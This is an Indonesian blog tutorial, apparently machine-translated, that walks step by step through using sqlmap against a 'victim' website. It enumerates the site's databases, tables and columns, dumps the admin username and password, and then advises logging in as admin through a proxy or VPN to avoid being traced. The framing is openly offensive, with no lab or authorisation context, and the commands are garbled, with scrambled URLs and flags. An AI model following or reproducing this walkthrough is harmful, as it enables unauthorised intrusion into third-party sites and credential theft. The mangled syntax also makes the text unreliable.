1. Buka terminal mundur dan jenis cd / pentest / database / sqlmap dan tekan enter. Sekarang sqlmap terbuka di terminal Anda
2. Sekarang menemukan situs rentan. (Baik saya sudah memiliki situs rentan)
3. Sekarang ketik perintah ini di terminal dan tekan enter. (Lihat di atas gambar)
python sqlmap.py-u http://yourvictim 'menyelinap / index.php id =? 4 -dbs
4. Sekarang Anda akan mendapatkan nama database website
Yah aku punya dua database aj dan information_schema kita akan memilih database aj.
5. Sekarang mendapatkan tabel database tersebut. untuk itu Anda perlu memasukkan perintah ini ke terminal Anda dan hanya tekan Enter.
python sqlmap.py-u slink / index.php http://yourvictim '? id = 4 -D (nama database)-tabel
6. Sekarang kita perlu untuk mengambil tabel dari database aj. paste perintah bawah perintah dan tekan enter.
python sqlmap.py-u http://www.yourvictim 'slink.com / index.php id =? 4 -D aj-tabel
7. Sekarang Anda akan mendapatkan daftar tabel yang disimpan dalam database aj.
8. Sekarang mari kita ambil kolom dari tabel admin
python sqlmap.py-u http://www.yourvictim 'slink.com / index.php id = 4? -T admin - kolom
Sekarang kita punya kolom dan kami mendapat username dan password
9. Sekarang mari kita ambil password admin
python sqlmap.py-u ? slink.com / index.php http://www.yourvictim 'id = 4 -T admin-U test - dumpSekarang kita punya username dan password dari website!
Sekarang hanya menemukan admin pidana website dan menggunakan proxy / vpn ketika Anda mencoba untuk login di website sebagai admin.
0 komentar:
Posting Komentar